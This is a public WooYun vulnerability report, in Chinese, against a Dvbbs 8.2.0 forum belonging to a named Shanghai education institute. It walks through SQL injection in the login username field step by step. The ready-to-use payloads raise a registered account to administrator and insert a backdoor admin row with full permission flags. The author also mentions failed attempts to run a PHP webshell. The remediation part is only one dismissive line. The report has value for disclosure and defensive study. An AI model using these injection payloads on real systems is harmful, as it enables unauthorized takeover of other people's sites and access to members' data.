漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-033847
漏洞标题:某教育集团 Dvbbs Version 8.2.0 程序漏洞(11万会员)
相关厂商:上海新世界外国语进修学院
漏洞作者: Leon
提交时间:2013-08-09 12:30
修复时间:2013-09-23 12:31
公开时间:2013-09-23 12:31
漏洞类型:未授权访问/权限绕过
危害等级:中
自评Rank:8
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-08-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
利用以前一个漏洞成功提权,并前后台管理,成功登录后台.
详细说明:
先在网站注册一个帐号 再退出到登录界面:用户名输入
';update dv_user set usergroupid=1 where username='elao'-- "elao" 为刚申请的帐号
密码填 刚才的密码,登录
他会提示密码错误.
这个页面不是系统自带的貌似做了过滤,所以重新找登录界面.随便点一个没有权限浏览的贴子,他会教你输入帐号,在这个地方就可以提权.
用户名输入
';update dv_user set usergroupid=1 where username='elao'-- "elao" 为刚申请的帐号
密码填 刚才的密码,登录
这是再使用注册的帐号和密码登录进去权限就是管理员的权限
下来就是和后台关联了,
先退出找到刚才的登录页面.
用户名输入 elao';insert into dv_admin (username,password,flag,adduser) values ('elao','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','elao')-- (elao 为刚才注册的帐号, 中间的MD5加密的 ,替换为 自己刚才用的密码加密后的MD5)
密码输入刚才的密码 登录后也是会提示错误。
然后使用自己注册的帐号和密码登录 就是后台管理员了。
漏洞证明:
上面图片就证明了,一句话不执行,上传php木马可以就是执行不了。快下班了,就不弄了。
修复方案:
官方有补丁吧。还是花钱买的版本。不至于还有这个漏洞
版权声明:转载请注明来源 Leon@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝